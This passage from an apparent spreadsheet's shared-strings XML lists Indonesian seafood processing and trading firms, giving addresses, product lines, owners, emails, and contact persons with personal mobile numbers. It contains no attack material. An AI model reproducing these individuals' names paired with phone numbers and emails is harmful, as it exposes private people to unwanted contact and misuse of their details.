    <t>Jl. Paludem No.42, Dusun Muncar, Kel. Tembokrejo, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Tuna Kaleng, Sarden Kaleng, Makerel Kaleng</t>
  </si>
  <si>
    <t>Sutjianto Kusuma</t>
  </si>
  <si>
    <t>Tembokrejo</t>
  </si>
  <si>
    <t>aviprima@gmail.com</t>
  </si>
  <si>
    <t>031-5020446</t>
  </si>
  <si>
    <t>Sutjianto Kusuma (08123034755), Ham Winarta 082199063508</t>
  </si>
  <si>
    <t>PT. QFI PRIMA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Cakung Cilincing Timur, Type Biz-C1 Hoek, Blok Green Sedayu 17, No. 001, Kel. Cakung Timur, Kec. Cakung, Kota Jakarta Timur</t>
  </si>
  <si>
    <t>Salmon Segar, Trout Segar, Cephalopoda Beku, Ikan Pelagis Beku, Salmon Beku, Trout Beku, Scallop Beku, Daging Tuna Beku</t>
  </si>
  <si>
    <t>JIMMY WIBOWO</t>
  </si>
  <si>
    <t>Cakung</t>
  </si>
  <si>
    <t>Cakung Timur</t>
  </si>
  <si>
    <t>ariawan.soejunus@icloud.com</t>
  </si>
  <si>
    <t>(021) 2246 8082</t>
  </si>
  <si>
    <t>ARIAWAN (082112878787)</t>
  </si>
  <si>
    <t>CV. BAROKAH PANIPAHAN</t>
  </si>
  <si>
    <t>Jl. Udang RT 003 RW 005, Kel. Panipahan, Kec. Pasir Limau Kipas, Kabupaten Rokan Hilir</t>
  </si>
  <si>
    <t>Segar, Kering</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar, Ikan Demersal Segar, Udang Segar, Udang Kering, Kerang Segar, Ikan Asin Kering, Rajungan Segar, Cephalopoda Segar</t>
  </si>
  <si>
    <t>Ratna</t>
  </si>
  <si>
    <t>Pasir Limau Kipas</t>
  </si>
  <si>
    <t>Panipahan</t>
  </si>
  <si>
    <t>barokahpanipahan12@gmail.com</t>
  </si>
  <si>
    <t>ratna 0811636655</t>
  </si>
  <si>
    <t>CV. PESONA MUSI</t>
  </si>
  <si>
    <t>Jl. Kolonel Burlian Lrg. Sukawana No.19 RT 001 RW 001, Kel. Karya Baru, Kec. Alang-alang Lebar, Kota Palembang</t>
  </si>
  <si>
    <t>DICKY POERWADI</t>
  </si>
  <si>
    <t>Alang-alang Lebar</t>
  </si>
  <si>
    <t>Karya Baru</t>
  </si>
  <si>
    <t>info@pempekberingin.id</t>
  </si>
  <si>
    <t>0711-5612400</t>
  </si>
  <si>
    <t>DICKY POERWADI (0711-5612400)</t>
  </si>
  <si>
    <t>PT. PESONA SARI BINTANG</t>
  </si>
  <si>
    <t>Jl. Mawar Raya No.9 Perumahan Pura Melati Indah (Gudang 2), Kel. Jati Rahayu, Kec. Pondok Melati, Kota Bekasi</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Beku, Ikan Demersal Segar, Cephalopoda Beku, Cephalopoda Segar, Tuna Beku, Tuna Segar, Udang Segar, Udang Beku, Salmon Beku, Salmon Segar</t>
  </si>
  <si>
    <t>S.Anam Saputro</t>
  </si>
  <si>
    <t>ptpsb12@gmail.com</t>
  </si>
  <si>
    <t>Wisman 081286001291</t>
  </si>
  <si>
    <t>PT. APNAL MAKMUR JAYA</t>
  </si>
  <si>
    <t>Jl. Barek Motor RT 002 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan</t>
  </si>
  <si>
    <t>Apnal Jony</t>
  </si>
  <si>
    <t>cihuat@outlook.com</t>
  </si>
  <si>
    <t>Yeny / 0812613110</t>
  </si>
  <si>
    <t>CV. LIBRA FOOD SERVICE</t>
  </si>
  <si>
    <t>Jl. Raya Prancis, Pergudangan Kosambi Permai Blok L No.7, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Telur Ikan Beku, Salmon Beku, Trout Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Rajungan Beku, Kerang Beku, Cephalopoda Segar, Kerang Segar, Ikan Demersal Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>ACHMAD AL AMIN</t>
  </si>
  <si>
    <t>sevice21librafood@gmail.com</t>
  </si>
  <si>
    <t>ANGELIA PRATIWI (087782966393)</t>
  </si>
  <si>
    <t>PT. BAHARI MAKMUR SEJATI CABANG MEDAN</t>
  </si>
  <si>
    <t>Jl. Pulau Sumatera No.13 KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan</t>
  </si>
  <si>
    <t>HENRY HIDAYAT</t>
  </si>
  <si>
    <t>qualitymdn@bmsfood.support</t>
  </si>
  <si>
    <t>061-6858746</t>
  </si>
  <si>
    <t>AGATHA ARIANY &amp; 081375357474</t>
  </si>
  <si>
    <t>Agatha Ariany</t>
  </si>
  <si>
    <t>UD. PACIFIK FISH</t>
  </si>
  <si>
    <t>RT 10 RW 02, Kel. Prigi, Kec. Watulimo, Kabupaten Trenggalek</t>
  </si>
  <si>
    <t>RINTA YUANA</t>
  </si>
  <si>
    <t>Prigi</t>
  </si>
  <si>
    <t>yuanarinta@yahoo.com</t>
  </si>
  <si>
    <t>Ateng</t>
  </si>
  <si>
    <t>CV. SAMUDERA MARINE FISH</t>
  </si>
  <si>
    <t>Jl. Letjen Gator Subroto No.99, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah</t>
  </si>
  <si>
    <t>HASWITA JAYA RAHMAT</t>
  </si>
  <si>
    <t>andreaschrisman@gmail.com</t>
  </si>
  <si>
    <t>(0631)-26631</t>
  </si>
  <si>
    <t>HALDI YUANDIKA</t>
  </si>
  <si>
    <t>CV. MUTIARA SHUNYI</t>
  </si>
  <si>
    <t>Jl. Marsekal Suryadharma Pergudangan Bandara Mas Blok D No.21, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang</t>
  </si>
  <si>
    <t>Belut Hidup, Labi-Labi Hidup</t>
  </si>
  <si>
    <t>NOVITA SARI</t>
  </si>
  <si>
    <t>cvmutiarashunyi@gmail.com</t>
  </si>
  <si>
    <t>PUTRI BAHARI</t>
  </si>
  <si>
    <t>Korong Simpang, Kel. Kataping, Kec. Batang Anai, Kabupaten Padang Pariaman</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku, Stik Ikan, Kembang Loyang Ikan</t>
  </si>
  <si>
    <t>ERMA FARIDA</t>
  </si>
  <si>
    <t>Batang Anai</t>
  </si>
  <si>
    <t>Kataping</t>
  </si>
  <si>
    <t>putribahariok@gmail.com</t>
  </si>
  <si>
    <t>ERMA FARIDA (085319606302)</t>
  </si>
  <si>
    <t>PT. SINAR MAKMUR SEMARANG</t>
  </si>
  <si>
    <t>Jl. Bawen Bukit Permai C32 RT 07 RW 01, Kel. Bawen, Kec. Bawen, Kabupaten Magelang</t>
  </si>
  <si>
    <t>Sisik Ikan Terdemineralisasi Untuk Kolagen</t>
  </si>
  <si>
    <t>ENDANG SETYO REJEKI</t>
  </si>
  <si>
    <t>Bawen</t>
  </si>
  <si>
    <t>ptsinarmakmur.smg@gmail.com</t>
  </si>
  <si>
    <t>(0293)361829</t>
  </si>
  <si>
    <t>ENDANG SETYO REJEKI 085225515129</t>
  </si>
  <si>
    <t>UD. PUTRI LAUT</t>
  </si>
  <si>
    <t>Jl. Purwosari RT 005 RW 004, Kel. Tambakrejo, Kec. Gayamsari, Kota Semarang</t>
  </si>
  <si>
    <t>Bandeng Duri Lunak, Krispy Ikan, Krispy Kulit Ikan, Krispy Rumput Laut</t>
  </si>
  <si>
    <t>Suhartono</t>
  </si>
  <si>
    <t>Gayamsari</t>
  </si>
  <si>
    <t>Tambakrejo</t>
  </si>
  <si>
    <t>suhartonoputrilaut@gmail.com</t>
  </si>
  <si>
    <t>ERWINA</t>
  </si>
  <si>
    <t>Jl. Ikan Nila RT 02 RW 02 Pekon, Kel. Pagelaran, Kec. Pagelaran, Kabupaten Pringsewu</t>
  </si>
  <si>
    <t>Abon Lele, Baby Fish, Stik Lele, Lele Crispy</t>
  </si>
  <si>
    <t>Sri Erna Ningsih</t>
  </si>
  <si>
    <t>Pagelaran</t>
  </si>
  <si>
    <t>ernaningsih300@yahoo.com</t>
  </si>
  <si>
    <t>Sri Erna Ningsih &amp; 085377865186</t>
  </si>
  <si>
    <t>PT. SUMBER ANEKA MAKANAN</t>
  </si>
  <si>
    <t>Komplek Pergudangan Sentra Industri Terpadu PIK Blok D-2 No.5, Kel. Kamal Muara, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Telur Ikan Beku, Telur Ikan Terbang Kering, Telur Ikan Segar</t>
  </si>
  <si>
    <t>Anthony Aliwarga</t>
  </si>
  <si>
    <t>Kamal Muara</t>
  </si>
  <si>
    <t>ptsumberanekamakanan@gmail.com</t>
  </si>
  <si>
    <t>021-56982700</t>
  </si>
  <si>
    <t>Muhamad Ghuril Kirom 082327531716</t>
  </si>
  <si>
    <t>CV. DUS INTERNATIONAL TRADING</t>
  </si>
  <si>
    <t>Jl. By Pass Ngurah Rai, Gg. Mina Utama No.9, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Tuna Beku, Tuna Segar, Ikan Pelagis Segar, Ikan Pelagis Beku, Ikan Demersal Beku, Udang Segar, Udang Beku, Kepiting Segar, Kepiting Beku, Cephalopoda Segar, Cephalopoda Beku, Lobster Segar, Lobster Beku, Kerang Segar, Kerang Beku, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>Sri Pujiastuti, BSC</t>
  </si>
  <si>
    <t>dustrading@yahoo.com</t>
  </si>
  <si>
    <t>Yosev Triono &amp; 081239022233</t>
  </si>
  <si>
    <t>KOSPERMINDO</t>
  </si>
  <si>
    <t>Jl. Kima 8 Kav. 3AI, Kota Makassar</t>
  </si>
  <si>
    <t>ARMAN ARFAH</t>
  </si>
  <si>
    <t>Panakukang</t>
  </si>
  <si>
    <t>Paropo</t>
  </si>
  <si>
    <t>kospermindo@yahoo.com</t>
  </si>
  <si>
    <t>0411-4723182</t>
  </si>
  <si>
    <t>TIWI 081342323755</t>
  </si>
  <si>
    <t>SAMILA</t>
  </si>
  <si>
    <t>PT. FISHINDO ISMA RAYA</t>
  </si>
  <si>
    <t>Jl. Raya Kenanti, Kel. Kenanti, Kec. Tambakboyo, Kabupaten Tuban</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Teri Beku, Udang Kipas Beku, Scallop Beku, Ikan Air Tawar Beku, Lobster Beku</t>
  </si>
  <si>
    <t>Beberapa pemegang saham</t>
  </si>
  <si>
    <t>Kenanti</t>
  </si>
  <si>
    <t>abuhnfh8@yahoo.com</t>
  </si>
  <si>
    <t>0356-412748</t>
  </si>
  <si>
    <t>Abu Hanifah (08161886537)</t>
  </si>
  <si>
    <t>Abu Hanifah</t>
  </si>
  <si>
    <t>PT. GIWANG CITRA LAUT</t>
  </si>
  <si>
    <t>Poros Pabrik Gula Takalar Km 1,5, Kel. Pa'rappunganta, Kec. Polobangkeng Utara, Kabupaten Takalar</t>
  </si>
  <si>
    <t>Kering, Lainnya, Reduksi</t>
  </si>
  <si>
    <t>Rumput Laut Kering, Alkali Treated Chips, Semi Refined Carrageenan</t>
  </si>
  <si>
    <t>Setiawan tedja</t>
  </si>
  <si>
    <t>Polobangkeng Utara</t>
  </si>
  <si>
    <t>Pa'rappunganta</t>
  </si>
  <si>
    <t>giwangcl@indosat.net.id</t>
  </si>
  <si>
    <t>0411-835171</t>
  </si>
  <si>
    <t>Ronny D. Tunggal &amp; 081342711809</t>
  </si>
  <si>
    <t>Ronny D Tunggal</t>
  </si>
  <si>
    <t>PERUSAHAAN KERUPUK KOMODO</t>
  </si>
  <si>
    <t>Jl. Jenggolo No.45, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Kerupuk Ikan, Kerupuk Udang</t>
  </si>
  <si>
    <t>HENNY TANTY</t>
  </si>
  <si>
    <t>komodosidoarjo@gmail.com</t>
  </si>
  <si>
    <t>031-8961005</t>
  </si>
  <si>
    <t>YUKI SUNARYO / 081230032876</t>
  </si>
  <si>
    <t>YUKI SUNARYO</t>
  </si>
  <si>
    <t>PT. ANDIRA INTERNUSA GEMILANG</t>
  </si>
  <si>
    <t>Jl. Jawa Blok G-1, Kel. Ganda Mekar, Kec. Cikarang Barat, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Daging Tuna Beku, Cephalopoda Beku, Ikan Demersal Beku, Salmon Beku</t>
  </si>
  <si>
    <t>Rahadhian A</t>
  </si>
  <si>
    <t>Ganda Mekar</t>
  </si>
  <si>
    <t>ptandirainternusagemilang@gmail.com</t>
  </si>
  <si>
    <t>021-21380446</t>
  </si>
  <si>
    <t>PT. ALVINDO MITRA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Jendral Sudirman No.48/647, Kel. Sungai Nangka, Kec. Balikpapan Selatan, Kota Balikpapan</t>
  </si>
  <si>
    <t>Udang Beku, Udang Segar, Ikan Demersal Beku, Ikan Demersal Segar, Ikan Pelagis Beku, Ikan Pelagis Segar, Cephalopoda Beku, Fillet Ikan Beku</t>
  </si>
  <si>
    <t>ALVIN LUKITO</t>
  </si>
  <si>
    <t>Balikpapan Selatan</t>
  </si>
  <si>
    <t>Sungai Nangka</t>
  </si>
  <si>
    <t>amm@alvindo.id</t>
  </si>
  <si>
    <t>0542-764132</t>
  </si>
  <si>
    <t>ROSID PURNOMO &amp; 0812 5310 752</t>
  </si>
  <si>
    <t>PURWITO</t>
  </si>
  <si>
    <t>PT. ANUGERAH SARI LAUT</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto, Lingkungan II, Kel. Pondok Batu, Kec. Sarudik, Kabupaten Tapanuli Tengah</t>
  </si>
  <si>
    <t>Tuna Loin Masak Beku</t>
  </si>
  <si>
    <t>Bellina</t>
  </si>
  <si>
    <t>pt_anugerahsarilaut@yahoo.com</t>
  </si>
  <si>
    <t>0631-7001555</t>
  </si>
  <si>
    <t>Rika, 081380949197</t>
  </si>
  <si>
    <t>PT. SURYA INDOALGAS</t>
  </si>
  <si>
    <t>Jl. Raya Wonoayu, Kel. Jimbaran Wetan, Kec. Wonoayu, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Tepung Agar-Agar</t>
  </si>
  <si>
    <t>Rasmachahjana Sulistyo</t>
  </si>
  <si>
    <t>Wonoayu</t>
  </si>
  <si>
    <t>Jimbaran Wetan</t>
  </si>
  <si>
    <t>indoalgasdc@gmail.com</t>
  </si>
  <si>
    <t>(031)8853174/(031)8853175</t>
  </si>
  <si>
    <t>Regulus Winantu Sukasworo 08123392161</t>
  </si>
  <si>
    <t>Regulus Winantu Sukasworo</t>
  </si>
  <si>
    <t>PT. ANUGRAH SAMUDERA PESAKA</t>
  </si>
  <si>
    <t>Griya Idola Industrial Blok A No.11, Jl. Raya Serang Km 12, Kel. Dukuh, Kec. Cikupa, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku, Udang Beku</t>
  </si>
  <si>
    <t>WENARDI GUNAWAN</t>
  </si>
  <si>
    <t>Dukuh</t>
  </si>
  <si>
    <t>asap10082018@gmail.com</t>
  </si>
  <si>
    <t>021-59642167</t>
  </si>
  <si>
    <t>WENARDI</t>
  </si>
  <si>
    <t>MINIPLANT JAKA TINGKIR (PT. KELOLA MINA LAUT)</t>
  </si>
  <si>
    <t>Desa Serangan RT 01 RW 01, Kec. Bonang, Kabupaten Demak</t>
  </si>
  <si>
    <t>Bonang</t>
  </si>
  <si>
    <t>suhardihamzah@gmail.com</t>
  </si>
  <si>
    <t>Arifianto</t>
  </si>
  <si>
    <t>PT. QL HASIL LAUT</t>
  </si>
  <si>
    <t>Jl. Raya Deandles Km 81.25, Kel. Sedayulawas, Kec. Brondong, Kabupaten Lamongan</t>
  </si>
  <si>
    <t>Tepung Ikan, Surimi Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Pari Beku, Cephalopoda Beku, Produk Perikanan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>QL RESOURCES SDN BHD</t>
  </si>
  <si>
    <t>siti.a@ql-indo.co.id</t>
  </si>
  <si>
    <t>0322-662828</t>
  </si>
  <si>
    <t>SITI ALFIYAH &amp; 08123129207</t>
  </si>
  <si>
    <t>CHIA SOON LAI</t>
  </si>
  <si>
    <t>PT. LAUT PANEN RAYA</t>
  </si>
  <si>
    <t>Jl. Cumi Raya No.3 Muara Baru, Room 305 dan 603, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Cephalopoda Beku, Ikan Demersal Beku, Salmon Segar, Trout Segar</t>
  </si>
  <si>
    <t>William Wong Sudarwo</t>
  </si>
  <si>
    <t>exim@seafermart.co.id</t>
  </si>
  <si>
    <t>021-66696277</t>
  </si>
  <si>
    <t>Dwi &amp; 088293361366</t>
  </si>
  <si>
    <t>Andriyanto</t>
  </si>
  <si>
    <t>PT. TUJUH SAMUDERA JAYA</t>
  </si>
  <si>
    <t>Jl. Homebase Armed, Kel. Nirannuang, Kec. Bontomarannu, Kabupaten Gowa</t>
  </si>
  <si>
    <t>Telur Ikan Terbang Beku, Telur Ikan Terbang Kering</t>
  </si>
  <si>
    <t>Agnes Tandiari</t>
  </si>
  <si>
    <t>Bontomarannu</t>
  </si>
  <si>
    <t>Nirannuang</t>
  </si>
  <si>
    <t>hkikkawa51@yahoo.co.jp</t>
  </si>
  <si>
    <t>Kikkawa Hisatomo</t>
  </si>
  <si>
    <t>PT. YUXING ALGAE INTERNATIONAL</t>
  </si>
  <si>
    <t>Pesisir Timur RT 001 RW 001, Kel. Klatakan, Kec. Kendit, Kabupaten Situbondo</t>
  </si>
  <si>
    <t>Reduksi, Kering</t>
  </si>
  <si>
    <t>Alkali Treated Cottonii Chips, Rumput Laut Kering</t>
  </si>
  <si>
    <t>QIU DONGKAI</t>
  </si>
  <si>
    <t>Kendit</t>
  </si>
  <si>
    <t>Klatakan</t>
  </si>
  <si>
    <t>yuxingalgaeinternational@yahoo.com</t>
  </si>
  <si>
    <t>XIE YANG</t>
  </si>
  <si>
    <t>PT. KURNIA MITRA MAKMUR PURWAKARTA</t>
  </si>
  <si>
    <t>Jl. Cinta Karya No.172 RT 011 RW 005, Kel. Cikopo, Kec. Bungursari, Kabupaten Purwakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Ikan Bernilai Tambah Beku, Ikan Berlapis Tepung Beku, Produk Perikanan Bernilai Tambah Beku, Ikan Hasil Budidaya Beku</t>
  </si>
  <si>
    <t>Ir. Sudiarso</t>
  </si>
  <si>
    <t>Bungursari</t>
  </si>
  <si>
    <t>Cikopo</t>
  </si>
  <si>
    <t>devimarliya1209@gmail.com</t>
  </si>
  <si>
    <t>0264-8330878</t>
  </si>
  <si>
    <t>Jarot Arif Subianto</t>
  </si>
  <si>
    <t>CV. SUMBER HARTA LAUT MAS</t>
  </si>
  <si>
    <t>Jl. Sisingamangaraja No.1-2 RT 041 RW 009, Kel. Passo, Kec. Baguala, Kota Ambon</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Tuna Loin Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>RICHARD ONGARA</t>
  </si>
  <si>
    <t>Baguala</t>
  </si>
  <si>
    <t>Passo</t>
  </si>
  <si>
    <t>cv.sumberhartalautmas@yahoo.com</t>
  </si>
  <si>
    <t>0911-322828</t>
  </si>
  <si>
    <t>KENRICK ONGARA &amp; 081318881407</t>
  </si>
  <si>
    <t>KENRICK ONGARA</t>
  </si>
  <si>
    <t>CV. LAUTAN MAS</t>
  </si>
  <si>
    <t>Jl. BTN Khayangan, Dusun Sandubaya Timur, Kel. Labuhan Lombok, Kec. Pringgabaya, Kabupaten Lombok Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Beku, Ikan Demersal Segar, Fillet Ikan Beku, Fillet Ikan Segar, Tuna Beku, Tuna Segar, Tuna Loin Beku, Tuna Loin Segar, Cephalopoda Beku</t>
  </si>
  <si>
    <t>MOHAMAD SHOLEH</t>
  </si>
  <si>
    <t>Pringgabaya</t>
  </si>
  <si>
    <t>Labuhan Lombok</t>
  </si>
  <si>
    <t>admlautanmas@gmail.com</t>
  </si>
  <si>
    <t>MOHAMAD SHOLEH 081805780764</t>
  </si>
  <si>
    <t>PT. TARAKAN FISERINDO SIPATUO</t>
  </si>
  <si>
    <t>Jl. Kurau RT 15, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan</t>
  </si>
  <si>
    <t>tarakanfiserindosipatuo@gmail.com</t>
  </si>
  <si>
    <t>Faizal Ammar / 082395168115</t>
  </si>
  <si>
    <t>Faizal Ammar</t>
  </si>
  <si>
    <t>PT. SUMBER INTI PANGAN</t>
  </si>
  <si>
    <t>Desa Cilowa RT 16 RW 04, Dusun Pahing, Kec. Kramat Mulya, Kabupaten Kuningan</t>
  </si>
  <si>
    <t>Kering, Fermentasi</t>
  </si>
  <si>
    <t>Tepung Udang, Tepung Terasi Udang</t>
  </si>
  <si>
    <t>GUNAWAN WIBISONO</t>
  </si>
  <si>
    <t>Kramat Mulya</t>
  </si>
  <si>
    <t>Cilowa</t>
  </si>
  <si>
    <t>auliya@sumberintipangan.com</t>
  </si>
  <si>
    <t>021-5504937</t>
  </si>
  <si>
    <t>Lukas Murwanto 08129923920</t>
  </si>
  <si>
    <t>UD. BAHARI MITRA LESTARI</t>
  </si>
  <si>
    <t>Kel. Girian Bawah, Kec. Girian, Kota Bitung</t>
  </si>
  <si>
    <t>NIA PERMATA SARI</t>
  </si>
  <si>
    <t>made.bml1@gmail.com</t>
  </si>
  <si>
    <t>0438 37714</t>
  </si>
  <si>
    <t>MADE 082188680966</t>
  </si>
  <si>
    <t>I MADE MERTA YADNYA</t>
  </si>
  <si>
    <t>PT. INDOSIGMA SURYA CIPTA</t>
  </si>
  <si>
    <t>Jl. Raya Kedungpane No.17, Semarang-Boja Km 4,3, Kel. Bringin, Kec. Ngaliyan, Kota Semarang</t>
  </si>
  <si>
    <t>Budi Surya Wijaya</t>
  </si>
  <si>
    <t>Bringin</t>
  </si>
  <si>
    <t>indosigmacorporation@gmail.com</t>
  </si>
  <si>
    <t>024-7628333</t>
  </si>
  <si>
    <t>Margaretha B.P , 08112671999</t>
  </si>
  <si>
    <t>Margaretha B.P</t>
  </si>
  <si>
    <t>PT. CENTRAL PULAU LAUT</t>
  </si>
  <si>
    <t>Jl. Romokalisari IV No.27, Kel. Romokalisari, Kec. Benowo, Kota Surabaya</t>
  </si>
  <si>
    <t>LAUW HARTANTO LUDY</t>
  </si>
  <si>
    <t>lauw_hartanto@yahoo.com</t>
  </si>
  <si>
    <t>LAUW HARTANTO LUDY / 081232877777</t>
  </si>
  <si>
    <t>PT. TRIRATU MUKTI KENCANA</t>
  </si>
  <si>
    <t>Yos Sudarso No. 275, Kel. Garuntang, Kec. Bumi Waras, Kota Bandar Lampung</t>
  </si>
  <si>
    <t>Suryani Widjaja</t>
  </si>
  <si>
    <t>Bumi Waras</t>
  </si>
  <si>
    <t>Garuntang</t>
  </si>
  <si>
    <t>triratukencana@yahoo.com</t>
  </si>
  <si>
    <t>0721-487541</t>
  </si>
  <si>
    <t>NASA BOGA</t>
  </si>
  <si>
    <t>Jl. Ceremai Ujung No.15 RT 002 RW 002, Kel. Bantarjati, Kec. Bogor Utara, Kota Bogor</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku, Pempek Ikan</t>
  </si>
  <si>
    <t>Hilman</t>
  </si>
  <si>
    <t>Bogor Utara</t>
  </si>
  <si>
    <t>Bantarjati</t>
  </si>
  <si>
    <t>cuex_gaul@yahoo.co.id</t>
  </si>
  <si>
    <t>Hilman/ 085210243121</t>
  </si>
  <si>
    <t>CV. DC JAYA</t>
  </si>
  <si>
    <t>Jl. Melati I No.68 Blok D RT 002 RW 002, Kel. Tanah Tinggi, Kec. Tangerang, Kota Tangerang</t>
  </si>
  <si>
    <t>Labi-Labi Hidup, Kura-kura Hidup, Lobster Hidup, Udang Ronggeng Hidup, Keong Laut Hidup, Kerang Hidup, Ikan Demersal Hidup, Belut Hidup, Kepiting Hidup</t>
  </si>
  <si>
    <t>Wawan Hermawan</t>
  </si>
  <si>
    <t>Tangerang</t>
  </si>
  <si>
    <t>Tanah Tinggi</t>
  </si>
  <si>
    <t>dcjaya.01@gmail.com</t>
  </si>
  <si>
    <t>021-55726939</t>
  </si>
  <si>
    <t>081294694566 (wawan)</t>
  </si>
  <si>
    <t>PT. WAHANA PRONATURAL TBK</t>
  </si>
  <si>
    <t>Pergudangan Tiara Jabon Blok B-6 Jl. Tambak Sawah No.1, Kel. Tambak Sawah, Kec. Waru, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>ARTHA LOVIE A</t>
  </si>
  <si>
    <t>Tambak Sawah</t>
  </si>
  <si>
    <t>iwansetiawan_se@yahoo.com</t>
  </si>
  <si>
    <t>031-5352705</t>
  </si>
  <si>
    <t>IWAN SETIAWAN - 08123107012</t>
  </si>
  <si>
    <t>IWAN SETIAWAN</t>
  </si>
  <si>
    <t>PT. BRILIANT OCEAN FISH</t>
  </si>
  <si>
    <t>Jl. Raya Tandurusa, Kel. Aertembaga Dua, Kec. Aertembaga, Kota Bitung</t>
  </si>
  <si>
    <t>Tuna Segar, Tuna Loin Segar, Tuna Beku</t>
  </si>
  <si>
    <t>Chen Shang Hung</t>
  </si>
  <si>
    <t>Aertambaga</t>
  </si>
  <si>
    <t>Aertembaga Dua</t>
  </si>
  <si>
    <t>info.briliantoceanfish@gmail.com</t>
  </si>
  <si>
    <t>0438-33337</t>
  </si>
  <si>
    <t>Novanina Pinangkaan 08124301894</t>
  </si>
  <si>
    <t>Novanina Pinangkaan</t>
  </si>
  <si>
    <t>PT. MAKMUR JAYA SEJAHTETRA</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna IV, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Beku, Ikan Demersal Segar, Tuna Beku, Tuna Segar, Cephalopoda Beku, Gurita Rebus Beku</t>
  </si>
  <si>
    <t>balipermata07@gmail.com</t>
  </si>
  <si>
    <t>0361-727099</t>
  </si>
  <si>
    <t>Mery Hogustan / Rian 081285321572</t>
  </si>
  <si>
    <t>IVAN HANS JORGIH</t>
  </si>
  <si>
    <t>PT. INDOMINA CIPTA AGUNG</t>
  </si>
  <si>
    <t>Jl. Tugu Wijaya III No.2 Kawasan Industri Wijayakusuma, Kel. Randugarut, Kec. Tugu, Kota Semarang</t>
  </si>
  <si>
    <t>Mahadi Tseng</t>
  </si>
  <si>
    <t>pt_indomina@yahoo.co.id</t>
  </si>
  <si>
    <t>024 8663624</t>
  </si>
  <si>
    <t>Agus &amp; 083838116211</t>
  </si>
  <si>
    <t>PT. INDO SEA FOOD</t>
  </si>
  <si>
    <t>Surimi Beku, Produk Perikanan Bernilai Tambah Beku, Tepung Ikan, Kerang Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Darwan</t>
  </si>
  <si>
    <t>indoseafood18@gmail.com</t>
  </si>
  <si>
    <t>0295-6999066</t>
  </si>
  <si>
    <t>Johan Chialis 085262456890</t>
  </si>
  <si>
    <t>Johan Chialis</t>
  </si>
  <si>
    <t>UD. JINAWI LUHUR</t>
  </si>
  <si>
    <t>Jl. Kalijaga No.159, Kel. Pengambiran, Kec. Lemah Wungkuk, Kabupaten Cirebon</t>
  </si>
  <si>
    <t>Caecilia Sunarto</t>
  </si>
  <si>
    <t>Lemahwungkuk</t>
  </si>
  <si>
    <t>Pengambiran</t>
  </si>
  <si>
    <t>caecilia.sunarto@yahoo.com</t>
  </si>
  <si>
    <t>0231-201273</t>
  </si>
  <si>
    <t>Caecilia Sunarto &amp; 08122335479</t>
  </si>
  <si>
    <t>CV. SENTOSA TRADING</t>
  </si>
  <si>
    <t>Jl. Raya Luwung No.3 RT 001 RW 001, Kel. Luwung, Kec. Mundu, Kabupaten Cirebon</t>
  </si>
  <si>
    <t>Kering, Lainnya, Fermentasi</t>
  </si>
  <si>
    <t>Ikan Asin Kering, Kerupuk Ikan, Kerupuk Udang, Sambal Terasi Udang, Terasi Udang, Campuran Seafood Snack, Dried Cephalopod</t>
  </si>
  <si>
    <t>NURSAMSURI R YAMAN</t>
  </si>
  <si>
    <t>Luwung</t>
  </si>
  <si>
    <t>misnen_80@yahoo.com</t>
  </si>
  <si>
    <t>0231-510318</t>
  </si>
  <si>
    <t>MISNEN (081337002375)</t>
  </si>
  <si>
    <t>PT. BINTANG MANDIRI BERSAUDARA</t>
  </si>
  <si>
    <t>Jl. Tandurusa Pantai Kecil, Kel. Aertembaga Dua, Kec. Aertembaga, Kota Bitung</t>
  </si>
  <si>
    <t>anastasialidya12@gmail.com</t>
  </si>
  <si>
    <t>0438-33222</t>
  </si>
  <si>
    <t>Maxillian Syahri Arief / 08115752727</t>
  </si>
  <si>
    <t>PEMPEK RIZKY</t>
  </si>
  <si>
    <t>Jl. KHM Asyik RT 029 RW 009, Kel. 3-4 Ulu, Kec. Seberang Ulu I, Kota Palembang</t>
  </si>
  <si>
    <t>Pempek Ikan, Kerupuk Ikan</t>
  </si>
  <si>
    <t>YANTI MALA</t>
  </si>
  <si>
    <t>Seberang Ulu I</t>
  </si>
  <si>
